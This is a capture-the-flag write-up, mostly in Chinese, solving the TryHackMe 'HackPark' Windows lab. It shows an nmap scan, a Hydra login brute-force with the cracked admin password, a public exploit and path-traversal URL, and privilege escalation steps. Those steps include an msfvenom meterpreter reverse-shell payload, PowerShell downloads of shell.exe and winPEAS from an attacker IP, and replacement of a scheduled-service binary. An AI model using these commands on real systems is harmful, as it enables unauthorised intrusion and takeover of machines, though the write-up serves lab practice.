【THM】HackPark-Practice
【THM】HackPark-Practice
hihopkc使用 Hydra 暴力破解网站登录,识别并使用公共漏洞,然后提升您在这台 Windows 机器上的权限!
1 | nmap -p- -sC -sV -T4 10.10.173.96 |
1 | Nmap scan report for 10.10.173.96 |
Deploy the vulnerable Windows machine
Whats the name of the clown displayed on the homepage?
Reverse Image Search
1 | pennywise |
Using Hydra to brute-force a login
我们需要找到一个登录页面来攻击并确定表单向 Web 服务器发出的请求类型。通常,Web 服务器会发出两种类型的请求,一种是用于从 Web 服务器请求数据的 GET 请求,另一种是用于向服务器发送数据的 POST 请求。
您可以通过右键单击登录表单,检查元素,然后读取方法字段中的值来检查表单发出的请求。如果您通过 BurpSuite 拦截流量,您也可以识别这一点(可以在此处找到其他 HTTP 方法)。
现在我们知道了请求类型并有了登录表单的 URL,我们可以开始暴力破解帐户了。
1 | hydra -l <username> -P .<password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' |
login: admin password: 1qaz2wsx
Below is a mini cheatsheet:
Command | Description |
---|---|
hydra -P |
Brute force against a protocol of your choice |
hydra -v -V -u -L |
You can use Hydra to bruteforce usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts) |
hydra -t 1 -V -f -l |
Attack a Windows Remote Desktop with a password list. |
hydra -l |
Craft a more specific request for Hydra to brute force. |
Compromise the machine
https://www.exploit-db.com/exploits/46353
可以看到
http://10.10.173.96/admin/app/editor/editpost.cshtml
把他上传一下
10.10.173.96/?theme=../../App_Data/files
Windows Privilege Escalation
1 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.63.201 LPORT=9001 -f exe > shell.exe |
1 | powershell -c "Invoke-WebRequest -Uri 'http://10.11.63.201:80/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'" |
1 | msf6 > use exploit/multi/handler |
进一步枚举计算机
运行的异常服务叫什么名字?
1 | powershell -c "Invoke-WebRequest -Uri 'http://10.11.63.201:8000/winPEAS.bat' -OutFile 'C:\Windows\Temp\winPEAS.bat'" |
1 | WindowsScheduler.exe |
What is the name of the binary you’re supposed to exploit?
have you checked for logs for the abnormal service?
Using this abnormal service, escalate your privileges!
1 | powershell -c "Invoke-WebRequest -Uri 'http://10.11.63.201:8000/shell.exe' -OutFile 'C:\Program Files (x86)\SystemScheduler\shell.exe'" |
1 | meterpreter > mv Message.exe Message.bak |
Privilege Escalation Without Metasploit
评论
匿名评论隐私政策
✅ 你无需删除空行,直接评论以获取最佳展示效果